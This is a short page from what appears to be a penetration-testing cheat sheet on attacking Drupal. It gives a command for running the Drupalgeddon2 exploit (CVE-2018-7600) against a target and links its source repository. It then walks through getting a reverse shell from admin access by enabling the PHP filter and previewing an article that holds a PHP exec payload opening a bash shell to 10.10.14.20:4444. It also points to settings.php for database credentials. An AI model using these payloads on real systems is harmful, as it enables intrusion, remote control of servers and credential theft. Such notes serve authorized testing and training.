Drupal

Drupalgeddon (<7.58, <8.5.1, <8.46, <8.3.9) - CVE-2018-7600

All version of drupal lower than 7.58 are vulnerable to RCE.

ruby drupalgeddon2.rb http://<ip>/
LogoGitHub - dreadlocked/Drupalgeddon2: Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)GitHub

From Admin to Reverse Shell

Firstly we need to enable PHP filter on Modules tab.

And go to Content -> +Add Content -> Article, select PHP code as Text Format and finally introduce the reverse shell on the body.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444>&1'"); ?>

Finally clicking Preview button a reverse shell is spawned to our listener.

Config files

Database Connection

$DRUPAL/sites/default/settings.php
PreviousJenkinsNextWordpress

Last updated

Was this helpful?